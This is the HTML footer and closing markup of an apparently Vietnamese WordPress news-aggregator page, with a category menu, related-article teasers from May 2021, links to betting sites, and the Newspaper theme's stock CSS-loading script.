class="td-all-devices"><a href="#"><img src="http://hethongtintuc.com/banner/no-banner-728x90.jpg"/></a></div></div> </div> </div> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-footer-info"><div class="footer-logo-wrap"><a href="http://bestweightlosspills2015.com/"><img class="td-retina-data" src="" data-retina="http://baotaolao.net/blogtintuc/wp-content/uploads/2017/04/logo-header@2x.png" alt="" title=""/></a></div><div class="footer-text-wrap"><div class="footer-email-wrap">Liên hệ chúng tôi: <a href="mailto:hethongvetinhtintuc@gmail.com">hethongvetinhtintuc@gmail.com</a></div></div><div class="footer-social-wrap td-social-style-2"> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Behance"> <i class="td-icon-font td-icon-behance"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Vimeo"> <i class="td-icon-font td-icon-vimeo"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="VKontakte"> <i class="td-icon-font td-icon-vk"></i> </a> </span></div></div> </div> </div> </div> </div> <!-- Sub Footer --> <div class="td-sub-footer-container td-container-wrap "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span td-sub-footer-menu"> <div class="menu-tin-tuc-container"><ul id="menu-tin-tuc-2" class="td-subfooter-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-11"><a href="http://bestweightlosspills2015.com">Trang chủ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5021"><a href="http://bestweightlosspills2015.com/category/suc-khoe">Sức khỏe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-661"><a href="http://bestweightlosspills2015.com/category/giao-duc">Giáo dục</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-660"><a href="http://bestweightlosspills2015.com/category/du-lich">Du lịch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-663"><a href="http://bestweightlosspills2015.com/category/oto-xemay">Ôtô- xe máy</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-665"><a href="http://bestweightlosspills2015.com/category/the-thao">Thể thao</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-662"><a href="http://bestweightlosspills2015.com/category/kinh-doanh">Kinh doanh</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-658"><a href="http://bestweightlosspills2015.com/category/nha-dat">Nhà đất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1751"><a href="http://bestweightlosspills2015.com/category/phap-luat">Pháp luật</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-4512"><a href="http://bestweightlosspills2015.com/category/thoi-trang">Thời trang</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-659"><a href="http://bestweightlosspills2015.com/category/cong-nghe">Công nghệ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1750"><a href="http://bestweightlosspills2015.com/category/giai-tri">Giải trí</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5024"><a href="http://bestweightlosspills2015.com/category/noi-ngoai-that">Nội ngoại thất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5025"><a href="http://bestweightlosspills2015.com/category/san-pham-dich-vu">Sản phẩm – dịch vụ</a></li> </ul></div> </div> <div class="td-pb-span td-sub-footer-copy"> © Trang tin tức được tổng hợp liên tục hằng ngày từ nhiều nguồn khác nhau. Trang web đang chạy thử nghiệm và chờ xin giấy phép của BTTTT. </br> Link bạn bè: <a href="https://trandau.net/video-clip-tran-dau/" target="_blank" title = "Video clip bóng đá">https://trandau.net/video-clip-tran-dau/</a> <a href="https://linkvaolode88.com" title="Link Vào Nhà Cái Lode88">https://linkvaolode88.com</a> , <a href="https://nhacaiuytin247.com/fabet" title="Link vào nhà cái Fabet - Nha Cai Uy Tin 247">https://nhacaiuytin247.com/fabet</a> , <a href="https://tipkeomoingay.club/tip-bong-da" title="Tip Bóng Đá Miễn Phí - Tip Kèo Mỗi Ngày Club">https://tipkeomoingay.club/tip-bong-da</a> , <a href="https://gamebai.club/" target="_blank" title = "game bài">https://gamebai.club/</a> , <a href="https://truoctran.com/" target="_blank" title = "Truoctran">https://truoctran.com/</a> </div> </div> </div> </div> </div><!--close td-outer-wrap--> <div class="td-more-articles-box"> <i class="td-icon-close td-close-more-articles-box"></i> <span class="td-more-articles-box-title">NHIỀU BÀI VIẾT HƠN</span> <div class="td-content-more-articles-box"> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"><img width="100" height="70" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích">Five Star Garden kiến trúc rất riêng nhiều diện tích</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-06T08:00:49+00:00" >6 Tháng Năm, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/san-pham-dich-vu/sua-chua-may-loc-nuoc-tai-nha-quan-thanh-xuan-chi-phi-re-nhat.html" rel="bookmark" title="Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi phí rẻ nhất"><img width="100" height="70" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2021/05/thay-loi-loc-nuoc-ha-noi-100x70.jpg" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2021/05/thay-loi-loc-nuoc-ha-noi-100x70.jpg 100w, http://bestweightlosspills2015.com/wp-content/uploads/2021/05/thay-loi-loc-nuoc-ha-noi-218x150.jpg 218w, http://bestweightlosspills2015.com/wp-content/uploads/2021/05/thay-loi-loc-nuoc-ha-noi-696x497.jpg 696w, http://bestweightlosspills2015.com/wp-content/uploads/2021/05/thay-loi-loc-nuoc-ha-noi.jpg 700w, http://bestweightlosspills2015.com/wp-content/uploads/2021/05/thay-loi-loc-nuoc-ha-noi-588x420.jpg 588w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi phí rẻ nhất"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/san-pham-dich-vu/sua-chua-may-loc-nuoc-tai-nha-quan-thanh-xuan-chi-phi-re-nhat.html" rel="bookmark" title="Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi phí rẻ nhất">Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi...</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-05T08:41:56+00:00" >5 Tháng Năm, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/du-an-feliz-en-vista-kenh-nhieu-loi.html" rel="bookmark" title="Dự án Feliz En Vista kênh nhiều lợi"><img width="100" height="70" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Dự án Feliz En Vista kênh nhiều lợi"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/du-an-feliz-en-vista-kenh-nhieu-loi.html" rel="bookmark" title="Dự án Feliz En Vista kênh nhiều lợi">Dự án Feliz En Vista kênh nhiều lợi</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-05T08:00:53+00:00" >5 Tháng Năm, 2021</time></span> </div> </div> </div> </div> </div> <!-- Theme: Newspaper by tagDiv.com 2017 Version: 7.8.1 (rara) Deploy mode: deploy uid: 609493b44cf98 --> <script type='text/javascript' src='http://bestweightlosspills2015.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.8.1'></script> <script type='text/javascript' src='http://bestweightlosspills2015.com/wp-includes/js/comment-reply.min.js?ver=4.9.17'></script> <script type='text/javascript' src='http://bestweightlosspills2015.com/wp-includes/js/wp-embed.min.js?ver=4.9.17'></script> <script async="async" type='text/javascript' src='http://bestweightlosspills2015.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.6'></script> <!-- JS generated by theme --> <script> (function(){ var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = 'http://bestweightlosspills2015.com/wp-content/themes/Newspaper/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = 'http://bestweightlosspills2015.com/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> </body> </html>